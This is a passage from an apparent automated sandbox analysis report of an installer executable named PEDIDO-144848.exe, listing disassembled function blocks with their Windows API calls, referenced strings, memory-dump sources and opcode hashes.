                                                          • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                          • Part of subcall function 00405978: lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                        • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405B42
                                                        • wsprintfA.USER32 ref: 00405B60
                                                        • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B9B
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BAA
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                        • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C38
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405C49
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C50
                                                          • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00405A17
                                                          • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405A39
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                        • String ID: %s=%s$NUL$[Rename]
                                                        • API String ID: 222337774-4148678300
                                                        • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                        • Instruction ID: 1eed59494e777df17b5db6228b66ba1829f219dd2eba3e9b173e6ae731b9f24b
                                                        • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                        • Instruction Fuzzy Hash: 503125B0A08B05ABE6203B615D48F6B3A5CDF45794F14053BFE01F62D2DA7CAC408EAD
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                        • CharPrevA.USER32(?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                        Strings
                                                        • "C:\Users\user\Desktop\PEDIDO-144848.exe", xrefs: 00406047
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040600C
                                                        • *?|<>/":, xrefs: 00406053
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-407276050
                                                        • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                        • Instruction ID: 5800177166b7667d3eaf53a22357e4554d28550b3292ec339307e94a63baae70
                                                        • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                        • Instruction Fuzzy Hash: 5011276184479129FB3296384C00B7B6FD94F567A0F19007BE9C6722C2C67C5C62836D
                                                        APIs
                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C2E
                                                        • MulDiv.KERNEL32(00094B7B,00000064,00096110), ref: 00402C59
                                                        • wsprintfA.USER32 ref: 00402C69
                                                        • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%${K
                                                        • API String ID: 1451636040-3453463094
                                                        • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                        • Instruction ID: 21607a1dc9e24acd8111b7ab95824f47c5a1c8f1a2671c4e1062bfa223269d08
                                                        • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                        • Instruction Fuzzy Hash: 8B014F70944209FBEF209F60DD4AEAE37A9AB04304F008039FA16A92D0D7B89951CB59
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404009
                                                        • GetSysColor.USER32(00000000), ref: 00404025
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404031
                                                        • SetBkMode.GDI32(?,?), ref: 0040403D
                                                        • GetSysColor.USER32(?), ref: 00404050
                                                        • SetBkColor.GDI32(?,?), ref: 00404060
                                                        • DeleteObject.GDI32(?), ref: 0040407A
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404084
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction ID: c3620b6f473fad47e7a0c0791398936244beda297bc66feae6272bbc27e0e58c
                                                        • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction Fuzzy Hash: D7214FB1904704ABCB319F78DD48B5BBBF8AF41714F048A29EB96B22E0D734E944CB55
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                          • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                        • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                        • String ID:
                                                        • API String ID: 3730416702-0
                                                        • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                        • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                        • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                        • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                        APIs
                                                          • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                        • GlobalFree.KERNEL32(?), ref: 100024B5
                                                        • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                        • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                        • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                        • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                        APIs
                                                        • lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                        • lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                        • lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,758B23A0), ref: 00405015
                                                        • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2531174081-0
                                                        • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                        • Instruction ID: d1dd411a73e10bc413e7a6ba64919406d2bbbb657998d141ba589d50d7388124
                                                        • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                        • Instruction Fuzzy Hash: 0D214C71900519AADF119FA5DD849DEBFA9EF09354F14807AF944A6290C7398D40CFA8
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040489F
                                                        • GetMessagePos.USER32 ref: 004048A7
                                                        • ScreenToClient.USER32(?,?), ref: 004048C1
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048D3
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction ID: 53a3bc3e7d347c8b02fcccb5944648bd46d0fd351ff65b71f1969629af7e9ac2
                                                        • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction Fuzzy Hash: 12019275D00219BAEB00DBA5DC41BFEBBBCAF55711F10412BBA00B71D0C7B469018BA5
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,00030000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                        • GlobalFree.KERNEL32(?), ref: 004027F2
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                        • Instruction ID: ecef423f8b7fb5116dd0415946ee68b484c5f893cd0af9153c7a5222f957d578
                                                        • Opcode Fuzzy Hash: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                        • Instruction Fuzzy Hash: B921AE71C00128BBCF216FA5CE49D9E7E79EF09324F14423AF511762D0C6794D419FA9
                                                        APIs
                                                        • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                        • wsprintfA.USER32 ref: 00404820
                                                        • SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$@y
                                                        • API String ID: 3540041739-3020698753
                                                        • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                        • Instruction ID: 9c2068d9445a5b6f252536eabbf1c91049bb0fb02782bdd1491d607ad1f2c465
                                                        • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                        • Instruction Fuzzy Hash: E711E773A041283BDB0065699C45EAF3698DB86334F254237FA25F31D1EA78CC1182E9
                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 00401D3F
                                                        • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                        • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                        • Instruction ID: b8adc288744d91ba617009adb3e02bef21eb0d6e3f954176feac09388768b409
                                                        • Opcode Fuzzy Hash: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                        • Instruction Fuzzy Hash: 45F0FFB2A04119BFE701EBA4DE88DAFB7BCEB44301B104466F601F2191C7749D018B79
                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                        • Instruction ID: 44e87a32571ed3235eb7b96b36fbe9a42cad9ebb5189372230b031547819aef2
                                                        • Opcode Fuzzy Hash: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                        • Instruction Fuzzy Hash: ED21A271E44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,Rse Setup), ref: 00403A7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: TextWindow
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$1033$Rse Setup
                                                        • API String ID: 530164218-2961777182
                                                        • Opcode ID: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                        • Instruction ID: 535a85070ebab7a8ba56d21747a6201fabbada84c5c70f31dda2a066eb9b82e2
                                                        • Opcode Fuzzy Hash: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                        • Instruction Fuzzy Hash: D1110E35B002019FD7209F15DC80A377B6CEBCA355728823BE841A73A0D73D9D028BA8
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405818
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405821
                                                        • lstrcatA.KERNEL32(?,00409014), ref: 00405832
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405812
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3355392842
                                                        • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction ID: 0a665bc2143073433464dc8fd220d9afc6aaff2f2e3703ee86bb110f897cf778
                                                        • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction Fuzzy Hash: DDD0A9A3606930AAE30222158C09EDF2A58CF12340B048037F200B22A2C63C8E418BFE
                                                        APIs
                                                        • CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                        • CharNextA.USER32(00000000), ref: 004058BE
                                                        • CharNextA.USER32(00000000), ref: 004058D2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\
                                                        • API String ID: 3213498283-3404278061
                                                        • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                        • Instruction ID: e63bfe958a3d000d539ac339b3831bddf0e80049928d73a3bf58654b49e63fc9
                                                        • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                        • Instruction Fuzzy Hash: 5CF0F653904F552AFB3272280C40B775B88DB5A361F14C077EE40B62C1D27C4C609FAA
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,00402E76,?), ref: 00402CA9
                                                        • GetTickCount.KERNEL32 ref: 00402CC7
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                        • Instruction ID: 9ab3963fa07bdcc1a95f8d1ddaaeb6e773ff80e4731962a5f71ef67b0361f4de
                                                        • Opcode Fuzzy Hash: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                        • Instruction Fuzzy Hash: B9F03030809521AFD6125B24FF8EDDE7A64AB41701B114477F414B11E4D7781885CBD9
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00404F5C
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00404FAD
                                                          • Part of subcall function 00403FD1: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403FE3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                        • Instruction ID: b201a4cd8f35b1f81cb2229438f9677fc33f9f69eb2c65fa3af33e2f38b160ff
                                                        • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                        • Instruction Fuzzy Hash: C9015EB150424AAFDF209F61DD81A5B3A26E7C4758F104037FB04B52D1D37AAC929A6E
                                                        APIs
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 0040555A
                                                        • CloseHandle.KERNEL32(?), ref: 00405567
                                                        Strings
                                                        • Error launching installer, xrefs: 00405544
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                        • Instruction ID: a44fcad5754d04da23f251c2f5d6a8b7866741138784f0b9a4d91a551686e283
                                                        • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                        • Instruction Fuzzy Hash: 93E0BFF4A002097FEB10AB64ED49F7B7BADEB00644F408561FD10F6190E674A9549A79
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,758B3410,00000000,C:\Users\user\AppData\Local\Temp\,00403663,0040347D,?), ref: 004036A5
                                                        • GlobalFree.KERNEL32(00847598), ref: 004036AC
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040368B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3355392842
                                                        • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                        • Instruction ID: cb5700cda5be72b1964cac96af1ae0fa6ff587f55f39b04be5f0e3e76017d6e4
                                                        • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                        • Instruction Fuzzy Hash: 78E0C2338011206BC7315F04EE04B2A777C6F48B26F020467ED447B3A087792C524BDC
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144848.exe,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 0040585F
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144848.exe,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 0040586D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3370423016
                                                        • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction ID: 48f05854ad55b04522f039bc0829861de91cdd92fb90a6685f37373cdb6fd5ef
                                                        • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction Fuzzy Hash: 05D0C773409DB05EF30362259C04B9F6A98DF17700F094466E580E6191C6789D518BAE
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                        • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                        • GlobalFree.KERNEL32(?), ref: 100011C7
                                                        • GlobalFree.KERNEL32(?), ref: 100011F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                        • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
